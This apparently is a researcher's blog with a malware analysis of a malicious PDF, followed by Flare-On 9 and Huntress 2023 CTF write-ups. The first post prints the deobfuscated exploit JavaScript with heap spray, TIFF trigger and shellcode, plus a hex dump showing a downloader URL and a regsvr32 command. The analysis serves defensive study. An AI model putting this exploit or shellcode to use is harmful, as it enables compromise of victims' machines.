The email was received to my Google Mail account and appeared in my inbox. It was easily accessible, but within two days Google did alert on the virus in the attachment and prevented downloading it. The email had one attachment, which could still be obtained as Base64 when viewing the email in its raw form: 92247.pdf.

A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, that contained an XML subform with embedded JavaScript. Boring...

Upon examining the JavaScript, I saw a large block of data that would normally contain the shell code, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained all integer numbers that were between 0 and 74. This is not standard shell code.

    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';

So I started looking at the surrounding code:



    8 0 obj <</Length 325325>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <asd/>as<config xmlns='123'><asd/>
    <xdp:present>
    <pdf>
    <xdp:interactive>1</xdp:interactive>
    <int>0</int>
    a
    <asd/>a<version>1.5</version>
    a<asd/>
    </pdf>
    </xdp:present>
    <asd/></config><asd/>
    <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
    <asd/>
    a<subform name="a1"> <pageSet>
    <pageArea id="roteYom" name="roteYom">
    <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
    <medium long="792pt" short="612pt" stock="default"/>
    </pageArea>
    </pageSet>
    <asd/>a
    <subform name='v236536b346b'>
    a<asd/>a<field name='qwe123b'>a<asd/>a<event activity='initialize'>
    <script contentTyp='application'
    contentType='application/x-javascript'>
    x='e';
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';
    cc={q:"var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q;

    q=x+'v'+'al';
    a=(Date+String).substr(2,3);
    aa=([].unshift+[].reverse).substr(2,3);
    if (aa==a){
    t='3vtwe';
    e=t['substr'];
    w=e(12)[q];
    s=[];
    ar=arr.split('@');
    n=cc;
    for(i=0;i<ar.length;i++){
    s[i]=n[ar[i]];
    }
    if(a===aa)w(s.join(''));
    }
    </script>a
    </event><ui>
    <imageEdit/>
    </ui>
    </field>
    </subform>
    </subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
    <xfa:data><a1 test="123">
    </a1>
    </xfa:data>
    </xfa:datasets>
    </xdp:xdp>
    endstream
    endobj
The first few things that popped out were obfuscated / escaped variable names. You can see a reference to "n" but nowhere where it is initialized. Instead, you see variables named "& # 000119;" and ""& # 000110;". These are the ASCII decimal values for "w" and "n" respectively. Additionally, mathematical operators, like "& lt;" are escaped as HTML "<". The big thing we look for is the "eval()" statement, and it is equally obfuscated as: x='e'; q=x + 'v'+'al';, making q = "eval".

But, what about that large block of data? And what is up with that unusual "cc" variable that contains a large list of characters. By analyzing the decoding "for" loop, you can see the meaning. The "cc" is actually the custom character set of the end result, and the large data block "arr" is a series of numbers that reference each individual character, each separated by a "@".

With this configuration, you can visually analyze the first few pointers:
0@1@2@3@4@1@5@5@6@7@8@9 equals "var padding;". Bingo. But, even with layer of obfuscation, a quick Python script makes short work of it:
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@11@3@5@5@28@30@28@28@9'
    cc="var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
    result=""
    for i in arr.split("@"):result += cc[int(i)]
    print result
When run, voila! Our obfuscated code:
    var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new
    Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a302
    0824a6e2f804a41414141260000000000000000000000000000001239804a6420600f00040000414
    14141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0
    374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f
    5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e240
    3dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf
    38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1
    083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5
    c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c
    7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00f
    f561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c
    46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f706874747
    03a2f2f757262616e2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6
    578650000";var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141
    4141260000000000000000000000000000007188804a6420600f0004000041414141414141416683
    e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ff
    ffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c9
    4941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ec
    ff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559
    e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
    00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc70424726567
    73c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7
    441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a00
    53ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e8
    9cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f757262616e
    2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6578650000";_l3=ap
    p;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.re
    place('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_
    l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _
    I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=
    _l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=
    0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(
    _I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(
    _I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=S
    tring.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I
    1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l
    9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toStr
    ing(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5=
    '';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I
    5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5
    ='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=
    _I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE
    4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAE
    DAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwE
    EAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_
    j7,'');if(_ll2.length%2)_ll2+=unescape('');_ll3=_j2(_ll2);with({k:_ll3})_I0(k
    );qwe123b.rawValue=_ll1}_j3();
With this type of output, I would typically use Malzilla to clean it up for exploit analysis. But, with the shell code in plain sight, I'll go right for the payload. There are actually two copies of the shell code, stored as "_l1" and "_l2", with a few slight differences between the two. The code is actually binary data stored as plaintext hex, where every two bytes equals the hexadecimal value for the binary character. Copying and pasting the data into a hex editor can convert it to binary.

Now, normally you would look for shellcode obfuscation and API resolutions with IDA Pro or a debugger like Immunity/OllyDbg, but this one is pretty straight forward. It's a simple downloader with the URL in plain text (Similar to a sample I demonstrated to TV's David McCallum... just saying ;)). When I view the data in my favorite free hex editor, HxD, I can see:
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 4C 20 60 0F 05 17 80 4A 3C 20 60 0F 0F 63 80 4A L `...€J< `..c€J
    00000010 A3 EB 80 4A 30 20 82 4A 6E 2F 80 4A 41 41 41 41 £ë€J0 ‚Jn/€JAAAA
    00000020 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
    00000030 12 39 80 4A 64 20 60 0F 00 04 00 00 41 41 41 41 .9€Jd `.....AAAA
    00000040 41 41 41 41 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 AAAAfƒäüü…äu4é_3
    00000050 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 Àd‹@0‹@.‹p.V‹v.3
    00000060 DB 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 Ûf‹^<.t3,.î..ÿÿ¸
    00000070 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4 75 51 ‹@0ÃF9.uû‡4$…äuQ
    00000080 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B éëLQV‹u<‹t5x.õV‹
    00000090 76 20 03 F5 33 C9 49 41 FC AD 03 C5 33 DB 0F BE v .õ3ÉIAü..Å3Û.¾
    000000A0 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 .8òt.ÁË..Ú@ëñ;.u
    000000B0 E6 5E 8B 5E 24 03 DD 66 8B 0C 4B 8D 46 EC FF 54 æ^‹^$.Ýf‹.K.FìÿT
    000000C0 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB $.‹Ø.Ý‹.‹.Å«^YÃë
    000000D0 53 AD 8B 68 20 80 7D 0C 33 74 03 96 EB F3 8B 68 S.‹h €}.3t.–ëó‹h
    000000E0 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 .‹÷j.Yè˜ÿÿÿâùè..
    000000F0 00 00 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 ..XPj@hÿ...PƒÀ.P
    00000100 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00 00 U‹ì‹^.ƒÃ.ÿãhon..
    00000110 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF hurlmTÿ.ƒÄ.‹èèaÿ
    00000120 FF FF EB 02 EB 72 81 EC 04 01 00 00 8D 5C 24 0C ÿÿë.ër.ì.....\$.
    00000130 C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 Ç.$regsÇD$.vr32Ç
    00000140 44 24 08 20 2D 73 20 53 68 F8 00 00 00 FF 56 0C D$. -s Shø...ÿV.
    00000150 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D ‹è3ÉQÇD..wpbtÇD.
    00000160 05 2E 64 6C 6C C6 44 1D 09 00 59 8A C1 04 30 88 ..dllÆD...YŠÁ.0ˆ
    00000170 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 D..AQj.j.SWj.ÿV.
    00000180 85 C0 75 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 …Àu.j.SÿV.j.ƒë.S
    00000190 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA ÿV.ƒÃ.ë.ë.G€?.uú
    000001A0 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE G€?.uÄj.jþÿV.èœþ
    000001B0 FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01 BD 33 CA ÿÿŽN.ì˜þŠ.‰o.½3Ê
    000001C0 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F Š[.ÆFy6./phttp:/
    000001D0 2F 75 72 62 61 6E 2D 67 65 61 72 2E 63 6F 6D 2F /urban-gear.com/
    000001E0 34 30 34 5F 70 61 67 65 5F 69 6D 61 67 65 73 2F 404_page_images/
    000001F0 30 32 30 36 2E 65 78 65 00 00 0206.exe..
The URL is a dead giveaway. A well trained eye can see additional strings appear, typically as four bytes of op-code following by four bytes of a string, like: codeDATAcodeDATAcodeDATA (Why? Because it takes 4 bytes of code to say "move this 4-bytes of data into a memory register at X location"). A visual analysis shows the command line: "regsvr32 -s wpbt.dll", as well as a DLL call "urlmon" (practice looking for those). So, from this, we can tell some of the functionality. We know that it at least downloads an executable file from a remote server to the local temporary path (API call to GetTempPathA) and runs it, and that it also potentially instills a DLL into the system. A view from within IDA Pro would tell more, but I think I've reached enough text with this posting.

To really see what it's doing, I'd chop that code down to the actual functional code, which normally starts after the large block of nulls. In this case, it begins with a somewhat "NOP sled" of 0x4141414141414141. Extract the code and run it through Shellcode2Exe.py, then run the resulting application in OllyDbg. OllyDbg will then resolve the API calls as they're being made, letting you see the calls that include urlmon.URLDownloadToFileA().

That's basically it. A quick one-hour write-up from home using free tools on a malicious PDF sent to my personal account. The end result is pretty boring itself, but I found the JavaScript interesting and decided to publish a few steps for those who were possibly curious about how it worked.

(Pseudo) Exploit Analysis:
Based on a comment that was posted today, I went back to analyse the exploit of the PDF. Exploit analysis isn't my forte by a long shot, but I wanted to show the basic steps of how I did this file. Also, I was pointed to other blogs that featured this same type of sample, but tried to wave their magic wand of obscurity to say "we manually de-obfuscated it and found...". This isn't rocket science, no need to keep it secret... The magic occurred elsewhere in the PDF, in something we'll call "Object 18":

    18 0 obj
    <</Rect [12.47 5.21 6.13.6.7] /Subtype/Widget /Ff 65536 /T (qwe123b[0]) /MK <</TP 1>> /Type/Annot /FT/Btn /DA (/CourierStd 10 Tf 0 g) /Parent 19 0 R /TU (qwe123b) /P 1 0 R /F 4>>endobj
This object (which is called by 19, which is called by 20, which is called by 21, which is called by 23 (the root object))  draws a rectangle and loads a widget in it named "qwe123b[0]", which refers basically to the output of the JavaScript. So, let's go back to our deobfuscated JavaScript and work backwards:
    qwe123b.rawValue=_ll1
There's our return value... _ll1. So, let's piece together what's returned:
    _ll1=_j8+_j9+_ll0+_j5;1
_j8 is a standard block of text, "SUkqADggAABB".
_j9 calls I2() that makes a block of text that is "QUFB" 10,984 times.
_l10 is another standard block of text.
_j5 is another standard block of text.
So, I would combine all of these values to see what the output would be. The magic behind it all is that the large block of text this produces is simply a string of Base64 encoded data. Upon decoding, you'll see the magic first few bytes (from _j8):
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 49 49 2A 00 38 20 00 00 41                       II*.8 ..A
These bytes refer to the file header of a TIFF graphic image. Oh, and those 10,984 "QUFB"'s? Those Base64 decode to "0x414141". That reduces our search. At this point, we would debug Acrobat to follow the flow of data through the application, setting breakpoints at areas that handle graphic images. But, as this isn't a 0-day, a few basic Google searches help lead us to a few possible culprits, all of which are basically libTiff vulnerabilities. There are numerous ones, but I don't feel that I'm qualified to pinpoint an exact one.

Flare-On 9 - The Worst Writeups

$
0
0

Since its inaugural year I have been a participant in the FireEye / Mandiant Flare-On challenges produced by FLARE, the FireEye Labs Advanced Reverse Engineering. FLARE is one of the industry's most accomplished team of reverse engineers and they have created an annual CTF/ that focuses on reverse engineering challenges, many of which are rooted in real life attacks and incident responses.

I have blogged about FLARE challenges in the past and many readers have noticed that my write-ups tend to steer towards the unexpected solutions. The fun, unconventional, and sometimes offensive solutions to the reader. After all, this is a time to have fun and play with challenges that I do not see on a regular basis. Much of my this originates from my prior experience in a reverse engineering team that focused on intrusions from nation state attacks. Our metrics were on how quick we can provide answers, not how in depth or concise we could be. So my immediate goal is on speed, identifying short cuts, and exploiting every advantage I can find. And then putting the proper methodology into tech debt.

And so, with the completion of Flare-On 9 (2022 edition) I have highlighted my own horrible solutions to a few of the challenges. 


Challenge 2 - Pixel Poker

This challenge opens as a simple Windows GUI-based application that displays a large matrix of seemingly random colors. This seems like the start of a steganography based challenge, like what they provided in 2015's challenges

In a quick review in IDA Pro, one of the first things I look for is the success criteria and the failure criteria. If you click more than 10 times, that is make 10 attempts to find the pixel, it will display a failure message and quit. The first effort then is modifying the execution to remove that check. Upon a comparing the number of attempts to 10 it will JNZ to the correct path. Instead of the check I just made this an absolute JMP. 

There is also an obvious RC4 decryption routine mixed in that appeared to be taking the window title, with the attempted x/y coords, as the key. However, during analysis, this appeared to be a decryption for that particular pixel and not of the entire image.


With the error check removed, I started the quick effort of just blindly clicking to see what would happen. Then, I tried automated clicking. I had just written functionality into Noriben to emulate human behavior by moving the mouse and clicking it. Since I had that code on hand I used it here.

When clicking down a column I realized something. All of the pixels were being reverted back to an original state and, when complete, were actually piecing together an image. This was inline with my thoughts on the RC4 decryption. So, instead of reverse engineering the program to determine the actual pixel, I just wrote a program to brute force every pixel.

importpyautogui
pyautogui.PAUSE=0
pyautogui.FAILSAFE=True

x_offset=10
y_offset=475
start_x=5+x_offset
start_y=60+y_offset
max_x=start_x+730-x_offset
max_y=start_y+600-y_offset

forxinrange(start_x,max_x):
foryinrange(start_y,max_y):
#print(x, y)
#pyautogui.moveTo(x, y)
pyautogui.click(x=x,y=y,clicks=1,button='left')

Within a few minutes I realized that there was text being written to at the bottom of the image. So, as shown in the code, I measured the pixel locations and focused my clicking via x and y offsets. I let it run for a few minutes, and the flag was found. Boom!




Challenge 10 - Nur geträumt

Now this is an interesting one. The description was a bit verbose and gave you a lot of detail to prepare for the challenge. As it was a macOS 7 disk image and application, you would need an emulator for it. Mini vMac, Basilisk, etc. IMO, there was too much help in the description, but installing a proper environment does have challenges. I obtained Mini vMac, the macOS 7 install disks from a suspicious and unauthorized source, and a series of blank disk images to install to. 



While that was installing I looked at the provided image. Using binwalk, strings, and a variety of tools showed just basic results. Namely a series of strings that included:

You found the flag!$Remove the umlaut before submi t
99 Luftballons
CRC16 for valid flag
> Flag string (try viewing in hex)
And an interesting short story.


Upon installing the application a quick execution shows a simple input box that displays random binary data when given a value. Using the provided SuperResEdit, there were suspicious items shown. A flag binary resource was found labeled 99 Luftballons.


Interesting. A 48-byte set of characters that is seemingly the final flag in encoded form. Putting that to the side I used the disassembly mode to review the application code. The initial challenge here is that it is written in 68k code, which I am completely unfamiliar with. I perused a number of articles, including MarkeyJester's Tutorial, to find the differences. No stack pushes, instead values are loaded into data registers (D0-Dx) and Address registers (A0-Ax). And can be done en masse before calling a function to load the necessary values.

I then found an online macOS software cracking guide from the 90s that helped immensely. And provided brief bits of levity.



With that at hand, I began looking at the decoding routine.



Since there was no easy means of copying information into the emulator, I took screenshots of the disassembled code, ran through through an online OCR, and pasted the results into my notes to mark up. Using the assembly tutorials I started work to arrange this into code, there is an obvious XOR (called EOR) operation. 

Overall... there was nothing much here that stood out. From the data given, one was to input a flag value. That flag value would be XOR'd by the "flag" resource, and the resulting answer would be CRC16's to result in a value of 0x2718. The 0x2718 and the size of the key data in within the resource, with the rest being just an XOR key.

But, at this stage, I could not find a proper key or flag to check the XOR against ... and I did not want to brute force that many bytes through CRC16.

At this point I needed a mental break. Challenges 8 and 9 had done me in. I was just drained and couldn't focus.

So, I went back into the app and just started typing. There was a big clue of 80s music, so I typed in random song titles. What got me thinking was when I typed in a type starting with "Just". The result below showed "Funn". So I tried typing in "Funn" and got "Just". mind blown, this is just a simple XOR routine. 

Knowing that, I went straight to crib dragging. I knew the flag ended with @flare-on.com, so it was a matter of finding where it exists in the result to find the appropriate key.

@flare-on.com
a@flare-on.com
aa@flare-on.com

And that was it. A set of obvious data appeared at the end of the results. "du etwas Zei". But since the @flare-on.com cannot possibly be at that location, I continued to drag it. After 32 "a"'s, it showed again. So now I know the potential length of my, before the domain part, is 32-bytes. 



A quick web search for "du etwas Zei" showed it as part of the lyrics to 99 Luftballons. It couldn't be that simple, could it? Knowing "@flare-on.com" would be in the lyrics, I typed enough out with that appended and eventually got somewhat of a flag. The results were the second line of the lyrics with underscores as spaces. 


I quickly typed in the rest of the first line and ... got most of the flag that then turned corrupted. "@flare-on.com" was missing. I was missing a byte. I put in a random byte and got the correct value. OK, so there was something missing. Knowing it's XOR, and assuming an underscore, I typed an underscore and got a question mark. Putting the question mark back into the answer gave me the underscore in the flag which. But I still had a corrupt "Lied". Seeing the umlaut in the lyrics, I entered it into the key and got the correct flag, for which the instructions said to omit upon submitting.




Challenge 11 - The challenge that shall not be named.

The ultimate challenge, and it is a hard one... If you complete it as planned. It's an executable with tell-tale signs of being a Python executable such as "PYZ" and "_MEIPASS". But, first, let's just run it.

I launched it and tracked results with Noriben ... nothing happened. Tried a few more times. Nothing. OK, maybe some anti-debugging in place.

I executed 11.exe via API Monitor to see what was killing it. Upon it terminating, I located the ExitProcess() and then worked backward to find whatever function was making it go there. Now, here's where I'm questioning myself, because the sample had two distinct failures that I don't see in the official write-ups. It attempted to load mscoree.dll and would fail if not found. 


I also saw a strcmp() between the filename (11.exe) and wwahost.exe. I may have misread this check during the challenge to think it was being used. I don't think it actually was part of the challenge, as it took place in kernel32 but, regardless, I was in a hurry and renamed 11.exe to wwahost.exe and executed from there.  (Did not take screenshot of this, just copied text to my notes)

#   Time of Day Thread  Module  API Return Value    Error   Duration
34836   1:29:34.235 PM  1   KERNEL32.DLL    wcsncpy_s ( 0x0000029293edff48, 260, "C:\Users\Admin\Desktop\11\11.exe", -1 )   0       0.0000055
34837   1:29:34.235 PM  1   KERNEL32.DLL    wcsrchr ( "C:\Users\Admin\Desktop\11\11.exe", '\' ) 0x000000b7275e8862      0.0000055
34838   1:29:34.235 PM  1   KERNEL32.DLL    _wcsicmp ( "11.exe", "wwahost.exe" )    -70     0.0000051


From there it executed, and I reviewed the results more intently. There were numerous calls by pytransform.pyd to copy small bytes of data from presumable the executable to memory.


There was also a distinct section of string comparisons where it was made obvious that this was using PyArmor for protection.


At this point it made a connection to www.evil.flare-on.com:




I suspended the process here and poked at the memory in Process Hacker 2 to see if I could what else was in the packet, or staged for the packet. And, was left dumbfounded when the flag was literally in the first result ...


This does make sense to a point. Data encrypted at rest must become decrypted eventually in memory. I just didn't expect it to be all in one place and packaged so neatly for me. But, hey, I'll take it.

I discussed this challenge with other winners. Their "short cut" was the simple method laid out in the write-up: to just hijack the local calls from within the PyInstaller extracted folder. Now I really felt like I cheated here 😂

But, in the interim since, have started working on a proper solution by recompiling CPython and dumping byte code at PyEval_EvalFrameDefault(), using existing examples.

I have named it Python Ginger, or PythonG.



I now have a valid excuse for why I am constantly typing "pythong" in my terminal.

Huntress CTF 2023 - Unique Approaches to Fun Challenges

$
0
0

As someone who has participated in numerous Capture The Flag (CTF) competitions, I was excited when Huntress Lab announced their CTF late last year. Anytime a new organization ventures into hosting CTFs, it brings fresh perspectives, twists, and innovative approaches to data manipulation to obtain flags.

I found their daily-released challenges to be particularly engaging. To rank high, participants had to swiftly complete all challenges. While other CTFs focus on different aspects, like Flare-On which emphasizes malware reverse engineering, Huntress Lab's CTF encompassed a wide range of Digital Forensics and Incident Response (DFIR) tasks. This included dealing with malware, forensic analysis, log examination, OSINT (Open Source Intelligence), recent emerging threats, and manipulation of live systems.

Many challenges involved datasets that are seldom addressed in other competitions. There were fewer challenges centered around random cryptography, key generation, or website attacks, and more focused on parsing large, unknown data structures and analyzing the results.

The Flare-On was occurring during this same time period. However, for reasons I won't go into here, I spent most of 2023 with significant cognitive impairment from a traumatic brain injury. While Flare-On is my go-to event, by the time I got to its third challenge I realized that I would not be able to focus enough to complete it. The Huntress Labs CTF of daily, short challenges was more of my speed at the time. Challenges could be completed in under an hour and scratched many of the mental itches. 

This isn't a comprehensive analysis of all the 30+ challenges, but I wanted to highlight some interesting and unique solutions. My background as a forensic investigator, malware analyst, reverse engineer, incident responder, threat analyst, and mentor to others provided me with various perspectives while tackling these challenges.

BlackCat


BlackCat came late in the competition and was actually right up my alley. The challenge provided you with a ransomware decryption tool with a set of encrypted files.

-rw-r--r--  1 rurik  staff 2814464 Sep 26 08:10 DecryptMyFiles.exe-rw-r--r--  1 rurik  staff 1190420 Sep 26 08:10 NOTE.pngdrwx------  7 rurik  staff     224 Sep 26 08:10 victim-files./victim-files:-rw-r--r--  1 rurik  staff  109857 Sep 26 08:10 Bliss_Windows_XP.png.encry-rw-r--r--  1 rurik  staff    8457 Sep 26 08:10 Huntress-Labs-Logo-and-Text-Black.png.encry-rw-r--r--  1 rurik  staff      74 Sep 26 08:10 flag.txt.encry-rw-r--r--  1 rurik  staff   13959 Sep 26 08:10 my-favorite-rock.jpg.encry-rw-r--r--  1 rurik  staff  191725 Sep 26 08:10 the-entire-text-of-hamlet.txt.encry

Simple execution showed that the file required a pass key to perform decryption. 



From there, it's a matter of finding the decryption routine. There are various ways of doing this. To make it easier, I've written my own IDAPython script for IDA Pro that simplifies the process. This is particularly effective in unstripped binaries that contain descriptive function names. This code is found below:

importidautilsimportida_funcsimportidcdefop_to_hex(op):try:op_value=int(op,16)ifop.isdigit()elseint(op[:-1],16)return'0x{0:02X}'.format(op_value)exceptValueError:returnopdeffind_xor_shift_operations():forfunction_eainidautils.Functions():func_name=ida_funcs.get_func_name(function_ea)func_name=func_name.ljust(50)forheadinidautils.Heads(function_ea,idc.get_func_attr(function_ea,idc.FUNCATTR_END)):mnemonic=idc.print_insn_mnem(head)ifmnemonicin["xor","shl","shr"]:op1=idc.print_operand(head,0)op2=idc.print_operand(head,1)ifop1!=op2:op2=op_to_hex(op2)instructions='{}  {}, {}'.format(mnemonic,op1,op2)line='%s\t%s'%(func_name,instructions)print(line)

In short, it iterates through every operation and looks for XOR and shift operations. The operands are compared to each other. In any instance where the first operand is operated on by a different address, the results are shown. For static values where IDA would typically show as 32h, it would convert to 0x32. Running this script produces a few hundred results, but a very quick review shows the obviously relevant lines:


Copy the code, double click main.main to go to that routine. Alt-T for text search for  "xor  r8d, r10d will find the instruction block:


The use of a simple movzx before an XOR suggests that this block is called iteratively over a string to XOR each byte. Nothing more. We could trace r8 register back to show that it originates from operations over the provided pass key with its own:

movzx   r8d, byte ptr [rdx+rbx]

So, a very simple multi-byte XOR between two strings, where the expected passkey is 8 bytes (other code not shown here).

As we see one file is an encrypted PNG file, we can do simple crib-dragging. That is, XOR the encrypted data by the expected known-good data, which should result in the key. By copying the known-good file header we can use Python malduck to make this simple:

>>>importmalduck>>>key=open('NOTE.png','rb').read()>>>data=open('victim-files/Bliss_Windows_XP.png.encry','rb').read()>>>dec=malduck.xor(key,data)>>>dec[0:10]b'cosmoboico'

By comparing the known-good header from NOTE.png to the encrypted value produces the key "cosmoboi". 

We can apply this key back to the encrypted flag to get the key:

>>>data2=open('victim-files/flag.txt.encry','rb').read()>>>malduck.xor(b'cosmoboi',data2)b"Keeping my flag here so it's safe!\n\nflag{092744b55420033c5eb9d609eac5e823}"


Texas Chainsaw Massacre: Tokyo Drift

With a simple challenge out of the way, let's dig into the fun ones.

This challenge contained a single "Application Logs.evtx" Windows event file:

17:46:14-rurik@~/CTF/Huntress_2023/done/blog$ file Application\ Logs.evtx

Application Logs.evtx: MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 268


This data can be easily parsed with evtx_dump from Willi Ballenthin's python-evtx library. There is a LOT of data here to sift through. A total of 323 events that can be dumped to raw XML (ugh). For example:

<?xmlversion="1.1"encoding="utf-8"standalone="yes"?><Events><Eventxmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><ProviderName="Microsoft-Windows-CAPI2"Guid="{5bbca4a8-b209-48dc-a8c7-b23d3e5216fb}"EventSourceName="Microsoft-Windows-CAPI2"></Provider><EventIDQualifiers="0">4097</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8080000000000000</Keywords><TimeCreatedSystemTime="2023-10-10 15:54:18.664185"></TimeCreated><EventRecordID>1720</EventRecordID><CorrelationActivityID=""RelatedActivityID=""></Correlation><ExecutionProcessID="1132"ThreadID="1884"></Execution><Channel>Application</Channel><Computer>DESKTOP-JU2PNRI</Computer><SecurityUserID=""></Security></System><EventData><Data>&lt;string&gt;CN=GlobalSignRootCA,OU=RootCA,O=GlobalSignnv-sa,C=BE&lt;/string&gt;&lt;string&gt;B1BC968BD4F49D622AA89A81F2150152A41D829C&lt;/string&gt;</Data><Binary></Binary></EventData></Event>


There was no obvious way I found to go straight at it, so I started poking for obvious signs. One came out when I search for terms related to the challenge name:

17:54:07-rurik@~/CTF/Huntress_2023/done/blog$ python /Users/rurik/Development/python-evtx/scripts/evtx_dump.py  ./Application\ Logs.evtx | grep -i chain

<EventData><Data>&lt;string&gt;Windows Installer installed the product.Product Name: The Texas Chain Saw Massacre (1974).Product Version: 8.0.382.5.Product Language: English. Director: Tobe Hooper.Installation success or error status: 0.&lt;/string&gt;


Looking around that event shows a nice blog of apparently Base64 data:

